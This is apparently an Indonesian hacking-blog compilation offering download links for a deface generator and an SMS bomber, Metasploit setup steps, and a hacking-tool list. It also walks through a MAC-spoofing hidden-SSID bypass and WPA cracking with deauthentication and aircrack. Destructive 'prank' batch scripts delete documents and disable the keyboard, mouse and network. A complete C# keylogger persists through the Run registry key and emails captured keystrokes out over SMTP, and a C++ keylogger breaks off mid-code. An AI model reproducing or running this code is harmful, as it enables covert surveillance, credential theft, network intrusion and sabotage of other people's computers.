http://www.multiupload.com/J5R3PTHG5Q
Deface Web Generator
kali aja berguna buat para web defacer....^_^
dongdot di :http://www.multiupload.com/XYY97RB30M
Result
http://www.virustotal.com/file-scan/report.html?id=8a31f918a947b7b40533d919cb8e9530093af95a10b13164de35efd40c626e1d-1296958526
Free Sms Bomb
instal framework 2.0 nya dulu kalo masih make xp sp2 kebawah biar aplikasi bisa jalan...bisa dicoba..
download di
rapidshare :
http://rapidshare.com/files/351968941/XteamBomber.exe
hotfile:
http://hotfile.com/dl/28962752/9b8d723/XteamBomber.exe.html
mediafire:
http://www.mediafire.com/?zmnmn1jobiz
Saya & Pihak penyedia layanan sms gratis ini tidak bertanggungjawab terhadap segala akibat dari penggunaan nama instansi, produk, layanan atau sejenisnya sebagai
nama pengirim. Segala bentuk penyalahgunaan materi informasi merupakan tindakan melanggar hukum dan dapat ditindak dengan tegas sesuai UU IT yang berlaku.
Jadi pergunakan dengan bijak sebagai sarana informasi yang bermanfaat.
Sengaja Saya Batesin Flood agar bisa di gunakan secara bijak..@_@
Metasploit di UBUNTU jaunty 9.04
hmm.. dengan ambisi membuat ubuntu serasa make backtrack yang terkenal dengan tools2 garangnya .. jadi pengen pasang metsploit di ubuntu ane yah itung2 iseng biar terasa lebih gahar aja ubuntu nya..xixixix...
Kita akan membutuhkan beberapa Liblary untuk medukung berjalannya MSF di ubuntu yang akan kita Install.
budjank@budjank-laptop:~$ sudo apt-get install subversion ruby libruby rdoc libyaml-ruby libzlib-ruby
budjank@budjank-laptop:~$ sudo apt-get install libopenssl-ruby libdl-ruby libreadline-ruby
budjank@budjank-laptop:~$ sudo apt-get install libiconv-ruby rubygems libgtk2-ruby libglade2-ruby
ok klo sudah sekarang baru pasang metasploitnya,,,
bisa dari
http://spool.metasploit.com/releases/framework-3.2.tar.gz
ato
budjank@budjank-laptop:~$ wget http://spool.metasploit.com/releases/framework-3.2.tar.gz
Unpack Program :
tar -xvzf framework-3.2.tar.gz
ok deh.. tunggu tuh smpe kelar..
klo dah kelar tinggal jalanin aja dah
budjank@budjank-laptop:~$cd framework-3.2
budjank@budjank-laptop:~$sudo ./msfgui
maka siap dijalankan versi guinya..
Control Regestri windows dengan C#
yah kita udah tau kan apa itu fungsi dari reg editor windows.. yah klo ada yang blom tau mending ngegoogle dulu dah.. nah klo udah tw mari simak code yang saya berikan @_@ kekekekek... code berikut berfungsi buat mendisable taskmanager di windot
oke gak usah basi2.. okay..@_@
using System;
using Microsoft.Win32;
Void DisableTaskManager()
{
RegistryKey regkey;
int OurValueInt = 1;
string subKey = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System";
try
{
regkey = Registry.CurrentUser.CreateSubKey(subKey);
regkey.SetValue("DisableTaskMgr", OurValueInt);
regkey.Close();
}
catch (Exception ex)
{
MessageBox.Show(ex.ToString());
}
}
Port Scaner Make C#
hasil dari bongkar-bongkar hdd eh ketemu source ini he2 yang fungsinya buat scan port emang sih klo mo dipikir udah banyak program2 yang bertebaran yang bisa di tanya kepada paklek google salah satunya pake Nmap yang Mantab tpi apa salahnya klo kita coba implementasi kan dengan menggunakan csharp yah itung2 belajar lah he2.. udah agak jadul sih.. tpi klo mo coba monggo ikutin codenya dibawah ini...@_@
using System;
using System.Text;
using System.Net.Sockets;
namespace Portscannerconssole
{
class Program
{
[STAThread]
static void Main(string[] args)
{
string IPAddressTarget = "192.168.1.1"; // IP Address Target
int startPort = 1000; // Port mulai di scanning
int endPort = 1100; // Port akhir yg di scanning
int totalOpenedPort = 0;
TcpClient TcpScan = null;
ArrayList content = new ArrayList();
Console.WriteLine("Analyzing....");
for (int currPort = startPort; currPort <= endPort; currPort++)
{
try
{
Console.Write(".");
TcpScan = new TcpClient();
TcpScan.Connect(IPAddressTarget, currPort);
content.Add(currPort.ToString());
totalOpenedPort++;
}
catch (Exception) { }
if (TcpScan != null)
TcpScan.Close(); // Jangan lupa release semua resources
}
Console.WriteLine("");
Console.WriteLine("Total opened port : {0} ", totalOpenedPort.ToString());
Console.WriteLine("Opened Ports :");
for (int i = 0; i < content.Count; i++)
{
Console.WriteLine((string)content[i]);
}
Console.ReadLine();
}
}
}
TuxCut 3.2 Ganti nya Netcut di ubuntu
sip langsung aja nih di unduh dibawah ini.. dan cut2.. temen2 di network mu..wakakakak
http://bitbucket.org/a_atalla/tuxcut/downloads/
Security (Hacking) Tools di Ubuntu
Wireshark – Network Traffic Analyzer
Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.
Install wireshark:
Buka terminal (seperti command prompt di windows), lalu ketikkan
#sudo aptitude install wireshark
Nessus – Remote Network Security Auditor
Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.
Install NESSUS:
#sudo apt-get install nessus
NMAP – The Network Mapper
Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.
Install NMAP:
#sudo apt-get install nmap
Etherape – Graphical Network Monitor Modeled after Etherman
Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.
Install Etherape:
#sudo apt-get install etherape
Kismet
Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.
Install Kismet:
#sudo apt-get install kismet
Chkrootkit – Checks for signs of rootkits on the local system
Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient’s Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
Install Chkrootkit:
#sudo apt-get install chkrootkit
Rkhunter – Rootkit, backdoor, sniffer and exploit scanner
Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.
Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.
Install Rkhunter:
#sudo apt-get install rkhunter
TCPDump – A powerful tool for network monitoring and data acquisition
Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.
Instal TCPDump:
#sudo apt-get install tcpdump
SNORT – Flexible Network Intrusion Detection System
Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.
Instal Snort:
#sudo apt-get install snort
Firestarter – program for managing and observing your firewall
Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.
Instal firestarter:
#sudo apt-get install firestarter
CLAMAV – anti-virus utility for Unix
Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:
- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya
- seluruh format file mail
- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.
Instal Clamav:
#sudo apt-get install clamav
Netcat – TCP/IP swiss army knife
Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.
Instal Netcat:
#sudo apt-get install netcat
John
Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.
Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.
Instal John the Ripper:
#sudo apt-get install john
Dnsniff – Various tools to sniff network traffic for cleartext insecurities
Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.
Sub-sub tools itu adalah berikuti ini:
* arpspoof – Send out unrequested (and possibly forged) arp replies.
* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
* dsniff – password sniffer for several protocols.
* filesnarf – saves selected files sniffed from NFS traffic.
* macof – flood the local network with random MAC addresses.
* mailsnarf – sniffs mail on the LAN and stores it in mbox format.
* msgsnarf – record selected messages from different Instant Messengers.
* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow – SSH traffic analyser.
* tcpkill – kills specified in-progress TCP connections.
* tcpnice – slow down specified TCP connections via “active” traffic shaping.
* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.
* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
Install dsniff:
#sudo apt-get install dsniff
Bypass Hidden SSID & MAC Address Filtering
The purpose of this blog post is to demonstrate why hidden SSID & MAC Address filtering should only be layers of wireless security used in conjunction with strong encryption such as WPA.
Below are the steps an attacker could take to bypass a hidden SSID and MAC Address filtering to gain a foothold on your network and either instigate further attacks or use your internet connection.
Tools
* Kismet
The Attack
1. I first use kismet to look at the wireless networks within range.

My target wireless network is "batman". I can see from kismet that this has no encryption and the SSID is hidden.
At this stage I wouldn't know that the AP was using MAC Address filtering so I could try to join the network using:
iwconfig eth1 essid batman
Then I would try to obtain an IP address using:
dhclient eth1
The request for an IP Address would fail as the WAP is filtering MAC addresses.
2. Within Kismet I look at the clients connected to "batman" to obtain a valid client MAC address.

I see an active client is using the MAC of 00:16:6F:4D:AE:8C
I could then either wait for the client to disconnect or use a tool such as aireplay-ng to force a disconnection. As this is a test lab I will simply disconnect the valid client.
3. I check my current wireless card config using ifconfig

Note: I see that Kismet has not brought the card out of promiscuous mode. This will need to be done manually.
4. I now want take my card out of promiscuous mode, change my MAC address to that of the valid client, and join the hidden (batman) network. To do this I use the following commands:
ifconfig eth1 -promisc
ifconfig eth1 down
ifconfig eth1 hw ether 00:16:6F:4D:AE:8C
ifconfig eth1 up
iwconfig eth1 essid batman

I verify the output of these commands with ifconfig and iwconfig as i go along.
5. I now request an IP address from the DHCP server on the WAP using:
dhclient eth1

I have successfully been assigned an IP address of 192.168.1.202 from the WAP (192.168.1.5 hmmm this is useful to know as I can try the web interface on that using either default passwords (Kismet will tell me the make of the WAP) or hydra........)
If the WAP was not using DHCP I would at this stage configure my card manually and set up my own DNS.
7. I now test connectivity to the web using ping:
ping www.yahoo.com

my ping works, this tells me I have web access and DNS is working correctly.
Conclusion
Hopefully this demonstration has proven to you how simple it is for an attacker to bypass some of the more basic restrictions. Don't rely on a hidden SSID or MAC Address filtering as your only security measures. They may stop the average neighbor from using your internet connection but they will not prevent an attacker from breaking into your network and using your internet connection.
Posted by SynJunkie
Crack a WPA/WPA2 Wifi Network using Ubuntu 7.10 (Gutsy)
what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen
1) U must capture the Full 4 Way Handshake.
2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.
There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.
This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.
You will need the following details
A Client connected to the AP to Deauth
ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure
you write it down correctly or the following will not work
Channel = This will be the channel your AP is Broadcasting on i.e channel 7
ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps
Step 1 - Start the wireless interface in monitor mode
Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)
Step 2 - Start airodump-ng to collect authentication handshake
Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0
Where:
-c 11 is the channel for the wireless network
- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.
-w psk is the file name prefix for the file which will contain the IVs.
ath0 is the interface name.
Important: Do NOT use the ”- -ivs” option. You must capture the full packets.
Step 3 - Use aireplay-ng to deauthenticate the wireless client
aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0
Where:
-0 means deauthentication
3 is the number of deauths to send (you can send muliple if you wish)
-a 00:1C:10:26:A9:39 is the MAC address of the access point
-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing
ath0 is the interface name
Step 4 - Run aircrack-ng to crack the pre-shared key
aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap
Where:
-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
Done now wait for some time It depends upon ur Dictionary file and the passphrase ,
You should now have your PSK passphrase
&evilmonkey000&
Usil dengan Program Batch windows
File batch adalah file yang berekstensi .bat. File batch adalah file yang berisikan sintak-sintak DOS (atau Command Prompt) di dalamnya. Sintak-sintak itu dapat berupa sintak internal maupaun sintak external. Jadi singkatnya, bahasa dalam pemogramman batch adalah sintak-sintak yang ada di dalam DOS. Batch file sama seperti kita mengetik command dalam command prompt tapi melalui perintah yang telah kita tulis dalam batch file itu.
berikut kumpulan script batch file yang bisa kitagunakan untuk menjahilin "eit.. dosa bos mo jahil2... tpi gpp lah buat belajar..@_@
1. Disable Windows Update:
Code:
@echo off
net stop "wuauserv"
2. Delete "My Documents" folder:
Code:
@echo off
del /f /q "%userprofile%\My Documents\*.*"
del /f /q "%userprofile%\Documents\*.*"
3. Disable Internet Connection:
Code:
@echo off
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
4. Kill A Process:
Code:
@echo off
taskkill /f /t /im "Process.exe"
5. Block Websites [contoh : Google.com]:
Code:
@echo off
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
6. Disable Task Manager:
Code:
@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >null
7. Ganti File Extensions:
Code:
@echo off
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
8. Disable Mouse:
Code:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key% /f
reg add %key% /v Start /t REG_DWORD /d 4
9. Disable Keyboard:
Code:
echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
10. Ganti Waktu di Komputer
Code:
@echo off
time 00:00
11. yang ini agak panjang dikit
@echo off
Echo Contoh file batch
Echo.
Echo Akses website, yaitu www.google.com
Start “C:\Programs files\internet explorer\iexplorer.exe” http://www.google.com
Pause
Echo.
Echo Membuat file Data.txt yang berisi list nama file dalam folder file bat
Dir >Data.txt
Pause
Echo.
Echo menghapus semua file musik di folder ini.
Del *.mp3
Pause
Echo.
Echo Menggainti nama Data.txt menjadi list.txt
Ren Data.txt List.txt
Pause
Echo.
Echo Mengkopi file batch ini ke dalam direktori D:\ kamu
Copy %0 D:\
Pause
Exit
12. ini yang paling simple
Start
nama file.bat
Simple Key Logger in C#
Ok bro langsung aja gak usah basa-basi
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;
namespace Keylogger
{
class appstart
{
public static string path = "C:/file.txt";
public static byte caps = 0, shift = 0, failed = 0;
public static void startup()
{
//Regedit --> Startup objects
RegistryKey rkApp = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);
if (rkApp.GetValue("Keylogger") == null)
{
rkApp.SetValue("Keylogger",Application.ExecutablePath.ToString());
}
rkApp.Close();//dispose of the key
}
public static void OnTimedEvent(object source, EventArgs e)
{
System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
msg.To.Add("username@gmail.com");
msg.To.Add("another.optional.address.to.send.to@domain.com");
msg.From = new MailAddress("username@gmail.com", "nickname", System.Text.Encoding.UTF8);
msg.Subject = "whatever.you.want.to.be.in.the.message.subject";
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.Body = "whatever.you.want.to.be.in.the.message.body";
msg.BodyEncoding = System.Text.Encoding.UTF8;
msg.IsBodyHtml = false;
msg.Priority = MailPriority.High;
SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "gmailpassword");
client.Port = 587;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
Attachment data = new Attachment(appstart.path);
msg.Attachments.Add(data);
try
{
client.Send(msg);
failed = 0;
}
catch
{
data.Dispose();
failed = 1;
}
data.Dispose();
if (failed == 0)
File.WriteAllText(appstart.path, ""); //empties the file
failed = 0;
} //end of the OnTimedEvent method
}//end of the appstart class
class InterceptKeys
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
public static void Main()
{
_hookID = SetHook(_proc);
appstart.startup();
System.Timers.Timer timer;
timer = new System.Timers.Timer();
timer.Elapsed += new ElapsedEventHandler(appstart.OnTimedEvent);
timer.AutoReset = true;
timer.Interval = 600000;
timer.Start();
Application.Run();
GC.KeepAlive(timer);
UnhookWindowsHookEx(_hookID);
}
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
StreamWriter sw = File.AppendText(appstart.path);
int vkCode = Marshal.ReadInt32(lParam);
if (Keys.Shift == Control.ModifierKeys) appstart.shift = 1;
switch ((Keys)vkCode)
{
case Keys.Space:
sw.Write(" ");
break;
case Keys.Return:
sw.WriteLine("");
break;
case Keys.Back:
sw.Write("back");
break;
case Keys.Tab:
sw.Write("TAB");
break;
case Keys.D0:
if (appstart.shift == 0) sw.Write("0");
else sw.Write(")");
break;
case Keys.D1:
if (appstart.shift == 0) sw.Write("1");
else sw.Write("!");
break;
case Keys.D2:
if (appstart.shift == 0) sw.Write("2");
else sw.Write("@");
break;
case Keys.D3:
if (appstart.shift == 0) sw.Write("3");
else sw.Write("#");
break;
case Keys.D4:
if (appstart.shift == 0) sw.Write("4");
else sw.Write("$");
break;
case Keys.D5:
if (appstart.shift == 0) sw.Write("5");
else sw.Write("%");
break;
case Keys.D6:
if (appstart.shift == 0) sw.Write("6");
else sw.Write("^");
break;
case Keys.D7:
if (appstart.shift == 0) sw.Write("7");
else sw.Write("&");
break;
case Keys.D8:
if (appstart.shift == 0) sw.Write("8");
else sw.Write("*");
break;
case Keys.D9:
if (appstart.shift == 0) sw.Write("9");
else sw.Write("(");
break;
case Keys.LShiftKey:
case Keys.RShiftKey:
case Keys.LControlKey:
case Keys.RControlKey:
case Keys.LMenu:
case Keys.RMenu:
case Keys.LWin:
case Keys.RWin:
case Keys.Apps:
sw.Write("");
break;
case Keys.OemQuestion:
if (appstart.shift == 0) sw.Write("/");
else sw.Write("?");
break;
case Keys.OemOpenBrackets:
if (appstart.shift == 0) sw.Write("[");
else sw.Write("{");
break;
case Keys.OemCloseBrackets:
if (appstart.shift == 0) sw.Write("]");
else sw.Write("}");
break;
case Keys.Oem1:
if (appstart.shift == 0) sw.Write(";");
else sw.Write(":");
break;
case Keys.Oem7:
if (appstart.shift == 0) sw.Write("'");
else sw.Write('"');
break;
case Keys.Oemcomma:
if (appstart.shift == 0) sw.Write(",");
else sw.Write("<");
break;
case Keys.OemPeriod:
if (appstart.shift == 0) sw.Write(".");
else sw.Write(">");
break;
case Keys.OemMinus:
if (appstart.shift == 0) sw.Write("-");
else sw.Write("_");
break;
case Keys.Oemplus:
if (appstart.shift == 0) sw.Write("=");
else sw.Write("+");
break;
case Keys.Oemtilde:
if (appstart.shift == 0) sw.Write("`");
else sw.Write("~");
break;
case Keys.Oem5:
sw.Write("|");
break;
case Keys.Capital:
if (appstart.caps == 0) appstart.caps = 1;
else appstart.caps = 0;
break;
default:
if (appstart.shift == 0 && appstart.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
if (appstart.shift == 1 && appstart.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (appstart.shift == 0 && appstart.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
if (appstart.shift == 1 && appstart.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
break;
} //end of switch
appstart.shift = 0;
sw.Close();
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
} //end of HookCallback method
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
}
}
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
}
}
huf...huf...huff... pusing gak bro.. sama ane juga pusing...huft...
simple keyloger c++
Apa itu keyloger..???
Keylogger adalah program spy.. ia akan mencatat
segala aktivitas yang kita lakukan di suatu komputer
dan menyimpan semua informasi kedalam log file.
Bekerja dengan mendeteksi signal keyboard yang kita
tekan. Awal mulanya program ini ditujukan bagi orang
tua agar bisa mengontrol aktifitas anak2 mereka di
komputer. Namun, oleh sebagian orang yang tidak
bertanggung jawab, program ini digunakan untuk
memata2i dan mencuri informasi2 yang mungkin
penting untuk mereka. Cukup dengan pengantarnya…
dalam percobaan kecil ini saya akan menerapkan base
hidden keyloger dengan bahasa c++…
#include
#include
#include
#include
#include
int main()
{
string log;
FreeConsole();
while(true)
{
if(GetAsyncKeyState(0x41))
{
cout<<"a";
log+="a";
Sleep (200);
};
if(GetAsyncKeyState(0x42))
{
cout<<"b";
log+="b";
Sleep (200);
};
if(GetAsyncKeyState(0x43))
{
cout<<"c";
log+="c";
Sleep (200);
};
if(GetAsyncKeyState(0x44))
{
Page 5 of 16
cout<<"d";
log+="d";
};
Sleep (200);
if(GetAsyncKeyState(0x45))
{
cout<<"e";
log+="e";
Sleep (200);
};
if(GetAsyncKeyState(0x46))
{
cout<<"f";
log+="f";
Sleep (200);
};
if(GetAsyncKeyState(0x47))
{
cout<<"g";
log+="g";
Sleep (200);
};
if(GetAsyncKeyState(0x48))
{
cout<<"h";
log+="h";
Sleep (200);
};
if(GetAsyncKeyState(0x49))
{
cout<<"i";
log+="i";
Sleep (200);
Page 6 of 16
};
if(GetAsyncKeyState(0x4A))
{
cout<<"j";
log+="j";
Sleep (200);
};
if(GetAsyncKeyState(0x4B))
{
cout<<"k";
log+="k";
Sleep (200);
};
if(GetAsyncKeyState(0x4C))
{
cout<<"l";
log+="l";
Sleep (200);
};
if(GetAsyncKeyState(0x4D))
{
cout<<"m";
log+="m";
Sleep (200);
};
if(GetAsyncKeyState(0x4E))
{
cout<<"n";
log+="n";
Sleep (200);
};
Page 7 of 16
if(GetAsyncKeyState(0x4F))
{
cout<<"o";
log+="o";
Sleep (200);
};
if(GetAsyncKeyState(0x50))
{
cout<<"p";
log+="p";
Sleep (200);
};
if(GetAsyncKeyState(0x51))
{
cout<<"q";
log+="q";
Sleep (200);
};
if(GetAsyncKeyState(0x52))
{
cout<<"r";
log+="r";
Sleep (200);
};
if(GetAsyncKeyState(0x53))
{
cout<<"s";
log+="s";
Sleep (200);
};
if(GetAsyncKeyState(0x54))
{
cout<<"t";
Page 8 of 16
log+="t";
};
Sleep (200);
if(GetAsyncKeyState(0x55))
{
cout<<"u";
log+="u";
Sleep (200);
};
if(GetAsyncKeyState(0x56))
{
cout<<"v";
log+="v";
Sleep (200);
};
